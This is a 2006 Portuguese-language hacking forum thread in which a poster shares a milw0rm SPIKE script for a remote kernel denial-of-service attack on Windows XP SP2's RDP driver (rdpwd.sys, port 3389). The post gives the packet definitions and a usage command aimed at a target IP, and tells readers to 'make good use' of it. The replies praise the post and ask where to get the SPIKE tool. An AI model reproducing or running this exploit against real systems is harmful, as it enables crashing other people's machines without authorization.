Windows XP ServicePack 2 DoS

Started by HadeS, 14 de June , 2006, 05:48:50 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

HadeS

14 de June , 2006, 05:48:50 PM
Code Select
// get SPIKE here: http://www.immunitysec.com/resources-freesoftware.shtml /str0ke
//
// Windows XP SP2 'rdpwd.sys' Remote Kernel DoS
//
// Discovered by:
// Tom Ferris
// tommy[at]security-protocols[dot]com
//
// Tested on:
// Mcft Windows XP SP2
//
// Usage (SPIKE) : ./generic_send_tcp 192.168.1.100 3389 remoteass.spk 1 0
//
// 8/9/2005 Security-Protocols.com
//
// This program is free software; you can redistribute it and/or modify it under
// the terms of the GNU General Public License version 2, 1991 as published by
// the Free Software Foundation.

s_block_start("packet_1");
s_string_variable("03");
s_binary("03 00 00 27 22 E0 00 00 00 00 00 43 6F 6F 6B 69 65 3A 20 6D 73 74 73 68 61 73 68 3D 41 64 6D 69 6E 69 73 74 72 0D 0A");
s_binary("03 00 00 27 22 E0 00 00 00 00 00 43 6F 6F 6B 69 65 3A");
s_string_variable("");
s_binary("41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41");
s_string_variable("");
s_block_end("packet_1");

s_block_start("packet_2");
s_int_variable(0x0500,5);
s_block_end("packet_2");

s_block_start("packet_3");
s_binary("000002020000");
s_string_variable("");
s_block_end("packet_3");

// milw0rm.com [2005-08-09] [/b]

Para o correto uso do exploit você deve ter o SPIKE devidamente instalado, o mesmo pode ser baixado no seguinte link: http://www.immunitysec.com/resources-freesoftware.shtml

Uso do exploit:
[i]./NOME_DO_EXPLOIT IP.DO.CARA.AQUI 3389 remoteass.spk 1 0[/i]

Façam bom uso.

Fonte: milw0rm.com

[b]HadeS[/b]

_Dr4k0_

#1
14 de June , 2006, 07:11:14 PM
Se tiver como dar uma explicação acho que vai cair bem..
100% Livre!!!Livre para escolher o que há de melhor no Windows e Linux. Livre de preconceito direto ou inverso!
Adote essa filosofia e tenha mais chance de sucesso profissional.

HadeS

#2
14 de June , 2006, 07:34:37 PM
Acho que basta ler os cometários do exploit.

HadeS

Ðark$pawn

#3
14 de June , 2006, 07:41:36 PM
Bom HadeS, a área de Exploits e Vulnerabilidades do DK está ganhando muito com vc!!!

Continue com esse ótimo trabalho... ;)

slul

#4
14 de June , 2006, 07:45:09 PM
otimo trabalho porém mesmo tendo nos comentarios do exploit serai bom citar as fontes =]


até mais

whit3_sh4rk

#5
14 de June , 2006, 07:48:31 PM
No exploit já veio todas as explicações galera..

QuoteFonte: milw0rm.com

E no topo fala o nome do coder, etc..

Mto bom mesmo cara, está contribuindo legal no fórum.. continue assim.

[]s

J.spY

#6
14 de June , 2006, 09:35:03 PM
HadeS,

Esse SPIKE só existe para plataformas Unix?

Porque nesse site [http://www.immunitysec.com/resources-freesoftware.shtml], só existe para Windows SPIKE Proxy.

[]'s

"...É melhor ficar calado deixando que todos pensem que você é um idiota, do que abrir a boca e não deixar a menor dúvida®..."

darknesshack

#7
15 de June , 2006, 10:13:31 AM
Nunca gostei muito desse Pack no Winxp mesmo  ;D!
Para seguir o trajeto,olhe ao mestre,siga o mestre,caminhe com o mestre,veja através do mestre,torne-se o mestre.

HadeS

#8
15 de June , 2006, 01:41:36 PM
Sim J.spY, só existe para Unix.

E o SPIKE Proxy não tem nada a ver, é o SPIKE mesmo que tem que baixar.

Link direto para o Download do SPIKE

Obs: O pacote é .tgz

HadeS

Shady

#9
15 de June , 2006, 02:21:44 PM
Muito bom HadeS. Ponto :)


Mundus Vult Decipi
Print
Go Up Pages1
User actions